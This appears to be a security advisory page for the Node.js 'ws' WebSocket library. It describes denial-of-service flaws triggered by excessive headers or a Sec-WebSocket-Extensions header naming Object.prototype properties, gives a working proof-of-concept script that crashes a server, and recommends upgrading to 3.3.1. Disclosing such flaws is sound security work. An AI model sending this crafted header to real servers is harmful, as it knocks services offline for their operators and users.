Package Instance

ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the [`server.maxHeadersCount`][] threshold could be used to crash a ws server.

Denial of Service
A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.

Denial of Service in ws
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r'
  ].join('\r');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```


## Recommendation

Update to version 3.3.1 or later.